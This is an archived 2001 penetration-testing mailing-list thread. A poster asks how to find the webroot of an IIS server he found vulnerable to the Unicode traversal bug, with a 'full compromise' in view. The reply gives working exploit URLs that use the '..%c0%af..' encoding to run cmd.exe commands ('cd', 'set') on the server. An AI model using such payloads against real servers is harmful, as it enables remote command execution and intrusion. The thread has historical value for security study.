Penetration Testing: RE: finding webroot on IIS

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Penetration Testing mailing list archives

RE: finding webroot on IIS

From: Yonatan Bokovza <Yonatan () xpert com>
Date: Thu, 14 Jun 2001 21:05:29 +0300

http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+cd
and
for further reading see:
http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set

-----Original Message-----
From: * [mailto:todd () ubermother net]
Sent: Thursday, June 14, 2001 07:30
To: pen-test () securityfocus com
Subject: finding webroot on IIS

hello all,

Recently i came across an IIS webserver that i found to be 
vulnerable to the 
Unicode attacks. However, i cannot determine the webroot of 
this drive, and 
therefore i am having troubles reaching a full comprimise.  
The directory 
"C:\Inetpub" exists, but the only contents of this directory 
is the folder 
"mailroot".

Additionally, when i connect and request the root document 
(ie GET / ), it 
returns the string: "<% Response.ContentType = "text/plain" %> HELLO"

Does anyone come across anything like this before, and what 
would be the 
simplest method of determining the webroot?

thanks in advance
todd willey
ubermother

By Date By Thread

Current thread:

Re: finding webroot on IIS, (continued)
- Re: finding webroot on IIS Frederic Guerin (Jun 15)
- Re: finding webroot on IIS Gary Warner (Jun 18)
  - 3 pigs building web servers? hacker wolf? Robert Shea (Jun 18)
    - Re: 3 pigs building web servers? hacker wolf? ghandi (Jun 19)
    - Re: 3 pigs building web servers? hacker wolf? Riley Hassell (Jun 19)
- RE: finding webroot on IIS Yonatan Bokovza (Jun 14)